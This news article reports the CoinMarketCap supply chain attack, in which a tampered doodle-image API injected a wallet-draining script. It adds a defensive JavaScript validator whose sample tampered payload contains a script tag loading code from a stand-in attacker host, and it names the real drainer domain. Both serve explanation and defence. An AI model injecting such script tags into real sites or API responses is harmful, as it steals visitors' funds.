CoinMarketCap Hit by Supply Chain Attack, Crypto Wallets Compromised

CoinMarketCap, a leading cryptocurrency price tracking site, was recently targeted in a supply chain attack that exposed visitors to a wallet-drainer scam. The attack tricked users into connecting their cryptocurrency wallets, leading to the theft of funds.

Earlier this year in January, visitors to CoinMarketCap’s homepage began seeing pop-up prompts asking them to connect their crypto wallets. These pop-ups appeared legitimate, mimicking a standard Web3 wallet connection request. However, once users connected their wallets, a malicious script executed and drained their cryptocurrency.

CoinMarketCap later confirmed that attackers exploited a vulnerability in the homepage’s doodle image to inject malicious JavaScript into the site. This vulnerability was traced to a tampered API call linked to the doodle image, which led to the fake wallet connection popup being displayed to users.

This attack is classified as a supply chain attack, meaning the breach didn’t target CoinMarketCap’s own servers but rather an external service it relied on. The attackers modified the API used by CoinMarketCap to retrieve the doodle image, injecting a malicious script tag into the JSON payload. This tag then loaded the wallet-draining script from an external domain, static.cdnkit[.]io.
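
One way a site could vet a third-party JSON response such as the doodle payload before rendering it, shown as an added example (not CoinMarketCap's code). The field names, the allowlisted host and both sample payloads are constructed assumptions.

```javascript
// Added example: field names and hosts are hypothetical, not CoinMarketCap's real schema.
const ALLOWED_IMAGE_HOSTS = new Set(["static.example-cdn.test"]); // assumed trusted image host

// Recursively collect every string in the payload together with its JSON path.
function collectStrings(value, path = "$", out = []) {
  if (typeof value === "string") out.push({ path, value });
  else if (Array.isArray(value)) value.forEach((v, i) => collectStrings(v, `${path}[${i}]`, out));
  else if (value && typeof value === "object")
    for (const [k, v] of Object.entries(value)) collectStrings(v, `${path}.${k}`, out);
  return out;
}

// Returns a list of findings; an empty list means the payload may be rendered.
function inspectDoodlePayload(payload, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  const findings = [];
  for (const { path, value } of collectStrings(payload)) {
    // Doodle data should be plain text and URLs, so any markup is rejected.
    if (/[<>]/.test(value)) findings.push(`${path}: contains HTML markup`);
    // Every URL-like substring (including protocol-relative) must be https on an allowlisted host.
    for (const candidate of value.match(/(?:[a-z][a-z0-9+.-]*:)?\/\/[^\s"'<>]+/gi) || []) {
      let url;
      try { url = new URL(candidate, "https://placeholder.invalid"); }
      catch { findings.push(`${path}: unparseable URL`); continue; }
      if (url.protocol !== "https:" || !allowedHosts.has(url.hostname))
        findings.push(`${path}: disallowed origin ${url.protocol}//${url.hostname}`);
    }
  }
  return findings;
}

// Constructed sample responses (not captured traffic).
const cleanPayload = { doodle: { title: "Anniversary", image: "https://static.example-cdn.test/doodles/a.png" } };
const tamperedPayload = { doodle: { title: "Anniversary",
  image: "https://static.example-cdn.test/doodles/a.png",
  caption: "<script src=\"https://cdn.attacker.example/inject.js\"></script>" } };

console.log(inspectDoodlePayload(cleanPayload));
console.log(inspectDoodlePayload(tamperedPayload));
```

A check like this belongs on the consuming side, next to a Content Security Policy that restricts `script-src`, so that a tampered upstream response fails closed instead of reaching the DOM.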

Upon discovering the breach, CoinMarketCap moved quickly to address the issue and confirmed in a statement on its Twitter/X profile that all systems are fully operational and secure.

Cybersecurity firm c/side reported that the attack resulted in over $40,000 stolen from over 100 users. The attackers, who communicated in French, shared a screenshot of their drainer panel on the Telegram messaging application, providing insight into the scale of the theft.

Cyberattacks are growing, especially those aimed at the cryptocurrency ecosystem, such as these wallet-draining attacks. They often target users who unknowingly connect their wallets to malicious sites or applications. Unlike traditional phishing schemes, wallet drainers are typically spread through social media, advertisements, and malicious browser extensions.

Users should exercise caution when connecting their wallets to any site. Always verify wallet connection requests, and contact your exchange or stay informed about emerging security threats in the crypto space.

